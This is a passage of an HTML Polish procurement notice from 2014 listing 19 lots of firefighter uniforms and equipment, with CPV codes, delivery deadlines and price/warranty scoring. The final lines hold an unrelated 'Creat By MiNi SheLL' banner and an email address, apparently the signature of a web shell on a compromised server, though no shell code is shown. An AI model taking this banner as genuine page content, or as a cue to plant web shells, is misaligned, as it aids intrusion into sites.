i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).

Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kominiarka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.8. Kominiarki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Szczegółowe wymagania okreśłone zostały w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ubrania specjalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.6. Ubrania specjalne określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.). 
Szczególowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Buty strażackie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.9. Buty Strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Hełm strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.10. Hełmy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych 
i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. Poz. 1002 z późn. zm.).
Szczegółowe wymagania określone zostały w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zatrzaśnik strażacki duży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zatrzaśnik strażacki duży: Wykonany zgodnie z wymaganiami techniczno - użytkowymi    pkt. 5.6. Zatrzaśniki określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.).
Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pas strażacki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany zgodnie z wymaganiami techniczno - użytkowymi pkt. 1.5. Pasy strażackie określonymi szczegółowo w Załączniku do Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r.  (Dz. U. z 2007 r. Nr.143 poz.1002 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pochewka na toporek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Zgodna z Rozporządzeniem MSWiA - tabela należności Nr 5 przedmiotów ekwipunku osobistego dla strażaka (Dz. U. Nr. 4 poz. 25 z dnia 30 listopada 2005 r.) Zał. Nr 9.
- Wykonana ze skóry naturalnej w kolorze czarnym.  
- pasująca do toporka lekkiego określonego w pkt. 6.4. Topory strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r.     nr 143. poz. 1002 z późn. zm.)
- pasująca (nadająca się do przypięcia) do pasa strażackiego określonego w pkt. 1.5 Pasy strażackie Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia                            20 czerwca 2007 r. (Dz. U. z 2007 r. nr 143. poz. 1002 z późn. zm.)
- posiadająca dwie kieszenie, w tym jedna na toporek,

Szczegółowe wymagania określonow Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Podpinka linkowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - wykonana z linki polipropylenowej o długości 1 m.,
- zakończona pętlą i haczykiem stalowym o średnicy ok. 8 mm,
- wielkość podpinki pozwalająca na spakowanie do pochewki na toporek,
- zgodna z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z 30 listopada 2005 r. (Dz. U. Nr 4 poz. 25 z 2006 r.) - tabela należności Nr 5.

Szczególowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ubrania koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4 częściowe - bluza, spodnie, czapka, kamizelka (kamizelka bez rękawów).
Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej z dnia 5 lutego 2007 r. (Dz. Urz. KG PSP z dnia 23 października 2009 r.) - KT 22.
Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Obuwie koszarowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zgodne z Zarządzeniem Nr 9 Komendanta Głównego PSP (Dz.Urz. nr 2 z 23.10.2009r)
Nr Karty technicznej - KT- 27

Szczegółowe wymagania okreśłono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Ubranie dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubrania KDS wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 23.

Szczegółowe wymagania okreśłono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.41.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Buty dla kadry dowódczo - sztabowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buty dla Kadry dowódczo sztabowej wykonane zgodnie z Zarządzeniem nr 9 Komendanta Głównego PSP (Dz. Urz. 2 z dnia 23 października 2009r.) numer karty technicznej KT - 28

Szczególowe wymagania okreśłono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Sztormiak.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonane zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 39.

Szczegółowe wymagania okreśłono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Koszulki letnie i koszulki zimowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszulka letnia: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 6.

Koszulka zimowa: Wykonana zgodnie z Zarządzeniem Nr 9 Komendanta Głównego Państwowej Straży Pożarnej (Dziennik Urzędowy nr 2 KG PSP z 2009 r.) w sprawie wzorców oraz szczegółowych wymagań cech technicznych i jakościowych przedmiotów umundurowania, odzieży specjalnej i środków ochrony indywidualnej użytkowanych w PSP - Numer karty wymagań technicznych: KT 7.

Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.83.20.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Worek marynarski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonany z wysokiej jakości materiałów brezentowych bawełnianych i lnianych impregnowanych -  wodoodpornych. Wysoka wytrzymałość na ścieranie i rozdarcia. Posiada pas na ramię, wzmocniony na dole, ściągany sznurem przewlekanym przez oczka metalowe, 
z klamrą metalową, zapinką i kłódką. Pojemność użytkowa 150 ltr., wysokość 1 metr. 
Kolor ciemny granat / ciemna zieleń.

Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Plecak (kostka).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - Plecak w kolorze khaki,
- Wytrzymały na ścieranie i rozdarcia,
- Na klapie posiada mocowanie na menażkę,
- Wymiary: wys: 37 cm, szer: 31 cm, gł.: 22 cm (+/- 5 cm), 
- wykonane z mocnego materiału np. brezent, bawełna, len, impregnowany, wodoodporny, ze wzmocnionym spodem,
- szerokie szelki,

Sczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.11.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Manierka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - pojemność ok.  1,0 l,
- posiada pokrowiec,
- korek manierki przymocowany do szyjki specjalnym, zabezpieczającym przed zgubieniem paskiem,
- na zewnątrz pokrowca kieszonka na tabletki do odkażania wody,
- posiada mocowanie do paska lub plecaka.
Musi posiadać dopuszczenie do kontaktu z żywnością.

Szczegółowe wymagania okreśłono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Menażka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Typ wojskowy, z wysokiej jakości stali kwasoodpornej, pojemność kociołka ok. 1,2 l., pojemność pokrywy do 0,8 l. Waga menażki nie powinna przekroczyć 0,9 kg. 
Musi posiadać dopuszczenie do kontaktu z żywnością.

Dopuszcza się również alternatywnie zaoferowanie menażki trzyczęściowej zawierającej jedno naczynie zamykane o pojemności ok. 1,2 l., jedno naczynie płytkie o pojemności 
ok. 0,8 l.

Szczegółowe wymagania określono w Rozdziale II SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.12.60-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Okres gwarancji - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com